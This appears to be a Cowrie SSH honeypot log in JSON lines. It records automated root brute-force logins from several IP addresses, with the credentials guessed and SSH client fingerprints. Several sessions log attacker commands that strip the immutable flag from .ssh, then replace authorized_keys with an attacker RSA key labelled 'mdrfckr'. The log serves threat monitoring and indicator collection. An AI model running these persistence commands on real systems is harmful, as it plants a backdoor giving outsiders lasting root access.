{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:42.944423Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:42.945393Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:43.255760Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:43.786505Z","src_ip":"212.227.235.229","session":"4920bfb1dddb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53722,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8ab84eb5db3","protocol":"ssh","message":"New connection: 212.227.235.229:53722 (1.2.3.4:22) [session: d8ab84eb5db3]","sensor":"my-vps","timestamp":"2025-09-08T23:28:43.917408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:43.918051Z","src_ip":"212.227.235.229","session":"d8ab84eb5db3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:43.995173Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:28:43.995888Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.056428Z","src_ip":"212.227.235.229","session":"d8ab84eb5db3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.306360Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.307245Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40250,"dst_ip":"1.2.3.4","dst_port":22,"session":"56b093e89e2d","protocol":"ssh","message":"New connection: 212.227.235.229:40250 (1.2.3.4:22) [session: 56b093e89e2d]","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.617761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.619045Z","src_ip":"212.227.235.229","session":"56b093e89e2d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.644086Z","src_ip":"212.227.235.229","session":"d8ab84eb5db3"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.785683Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.787014Z","src_ip":"212.227.235.229","session":"d8ab84eb5db3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:44.926373Z","src_ip":"212.227.235.229","session":"56b093e89e2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:28:46.218307Z","src_ip":"212.227.235.229","session":"56b093e89e2d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:47.536428Z","src_ip":"212.227.235.229","session":"56b093e89e2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33962,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a44281b6c96","protocol":"ssh","message":"New connection: 212.227.235.229:33962 (1.2.3.4:22) [session: 4a44281b6c96]","sensor":"my-vps","timestamp":"2025-09-08T23:28:47.858824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:47.859708Z","src_ip":"212.227.235.229","session":"4a44281b6c96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:48.176617Z","src_ip":"212.227.235.229","session":"4a44281b6c96"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:49.600100Z","src_ip":"212.227.235.229","session":"4a44281b6c96"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:49.913460Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:49.918064Z","src_ip":"212.227.235.229","session":"4a44281b6c96"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":37646,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ada9ace4d1e","protocol":"ssh","message":"New connection: 103.193.178.227:37646 (1.2.3.4:22) [session: 8ada9ace4d1e]","sensor":"my-vps","timestamp":"2025-09-08T23:28:55.755351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:55.756228Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:56.036200Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.login.success","username":"root","password":"nihao123!","message":"login attempt [root/nihao123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:57.157432Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:57.712128Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:57.712882Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:57.713924Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:57.984883Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":38300,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a1939283ab9","protocol":"ssh","message":"New connection: 3.131.215.38:38300 (1.2.3.4:22) [session: 0a1939283ab9]","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.379427Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.441354Z","src_ip":"3.131.215.38","session":"0a1939283ab9"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.442393Z","src_ip":"3.131.215.38","session":"0a1939283ab9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:58.647035Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.647691Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.919285Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:58.920164Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":37660,"dst_ip":"1.2.3.4","dst_port":22,"session":"2257054b82cb","protocol":"ssh","message":"New connection: 103.193.178.227:37660 (1.2.3.4:22) [session: 2257054b82cb]","sensor":"my-vps","timestamp":"2025-09-08T23:28:59.181783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:59.182725Z","src_ip":"103.193.178.227","session":"2257054b82cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:59.445042Z","src_ip":"103.193.178.227","session":"2257054b82cb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:29:00.557053Z","src_ip":"103.193.178.227","session":"2257054b82cb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:01.821941Z","src_ip":"103.193.178.227","session":"2257054b82cb"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":37664,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94d2f0a3982","protocol":"ssh","message":"New connection: 103.193.178.227:37664 (1.2.3.4:22) [session: e94d2f0a3982]","sensor":"my-vps","timestamp":"2025-09-08T23:29:02.095379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:29:02.096532Z","src_ip":"103.193.178.227","session":"e94d2f0a3982"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:29:02.366712Z","src_ip":"103.193.178.227","session":"e94d2f0a3982"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:29:03.485686Z","src_ip":"103.193.178.227","session":"e94d2f0a3982"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:03.758173Z","src_ip":"103.193.178.227","session":"8ada9ace4d1e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:29:03.763245Z","src_ip":"103.193.178.227","session":"e94d2f0a3982"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":57348,"dst_ip":"1.2.3.4","dst_port":22,"session":"7790cc2ef547","protocol":"ssh","message":"New connection: 182.18.161.165:57348 (1.2.3.4:22) [session: 7790cc2ef547]","sensor":"my-vps","timestamp":"2025-09-08T23:29:16.228524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:29:16.229578Z","src_ip":"182.18.161.165","session":"7790cc2ef547"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:29:16.488101Z","src_ip":"182.18.161.165","session":"7790cc2ef547"}
